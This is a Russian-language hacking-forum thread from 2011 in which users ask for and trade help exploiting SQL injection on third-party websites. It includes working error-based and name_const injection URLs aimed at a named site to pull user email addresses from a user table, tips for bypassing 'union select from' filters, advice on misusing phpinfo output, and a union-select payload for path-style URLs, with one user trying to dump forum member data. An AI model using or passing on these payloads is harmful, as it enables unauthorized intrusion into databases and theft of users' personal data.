Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    :) действительно глупый вопрос. Вопрос очень странно поставлен, я затрудняюсь на него ответить.
     
    _________________________
  2. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Подскажите мужики как обойти фильтрацию FROM в sql injection
    Хостинг на SpaceWeb
     
  3. Drakula208

    Drakula208 New Member

    Joined:
    28 Jun 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?
     
  4. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Насколько я помню, там фильтруется последовательность union select from, обходится POST'ом, если скрипт его принимает, либо подзапросы.
     
    1 person likes this.
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    попроси админа что бы дал тебе доступ по ssh..и тогда заходи..из пхпинфо слово инфо тебе о чем нибудь говорит? информация тебе поможет если ты нашел скуль и имеешь файл_прив ..либо инклюд..
     
    1 person likes this.
  6. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вот такая проблема:
    http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28select+count%280%20%29,concat%28%28select%20count%28*%29%20from%20user%29,floor%28rand%280%29*2%29%29+from%20+information_schema.tables+group+by+2+limit+1%29a%29

    выдает количество юзеров в таблице user

    Message: Can't execute query: Duplicate entry '17661' for key 1

    но вот при выводе полей пишет ошибку:

    http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28select+count%280%20%29,concat%28%28select%20mail%20from%20user+limit+1,1%29,floor%28rand%280%29*2%29%29+from%20+information_schema.tables+group+by+2+limit+1%29a%29

    Message: Can't execute query: Unknown column 'table_name' in 'field list'

    в чем может быть проблема?
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.uk121.com/events_view.php?eid=(select*from+(select+name_const((select+mail+from+user+limit+1),1),name_const((select+mail+from+user+limit+1),1))a)
    
     
    #15847 Seravin, 12 Jan 2011
    Last edited: 12 Jan 2011
  8. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    так все равно вывода нет
     
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    скобку пропустил. исправил
     
    1 person likes this.
  10. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    Seravin, спасибо большое
     
  11. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    поставил кавычку
    вылезло
    получается
    правильно ли я составил?
     
  12. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    что ты составил? ты просто сделал то что делает .htaccess
     
    1 person likes this.
  13. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    http://xxxx.net/?id=1 при этом запросе не отображает ту страницу которая была при http://xxxx.net/1/
    в этом смысле имел ввиду
     
  14. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    логично что не правильно?
     
  15. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    какой запрос составить чтобы отображало ту же страницу как и при http://xxxx.net/1/

    http://xxxx.net/index.php?dir=1
    или
    http://xxxx.net/?pid=1
     
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    1) а нам то как узнать?
    2) а зачем ты это делаешь? ты скулю расскрутить не можешь при http://xxxx.net/1/ ?
     
  17. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    точно не знаю как делать при таком виде, можешь подсказать примерчик
     
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    а чем он отличается от обычной скули?
    http://xxxx.net/1+and+1=2+union+select+1,2,3,4,5,6+--+/
     
    1 person likes this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    мда уж, для тех кто в танке id=1 равно с /1/ , id=1+union+select+bla bla bla,...../1+union+select+bla bla bla
     
  20. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    mysql 5 версия

    выводимые поля 2 и 3

    не выводит
    не выводит
    тоже не выводит

    group_concat, concat пробовал
    из другой любой кроме ibf_members выводит данные, как обойти?
     
    #15860 noviyuser, 12 Jan 2011
    Last edited: 12 Jan 2011
Thread Status:
Not open for further replies.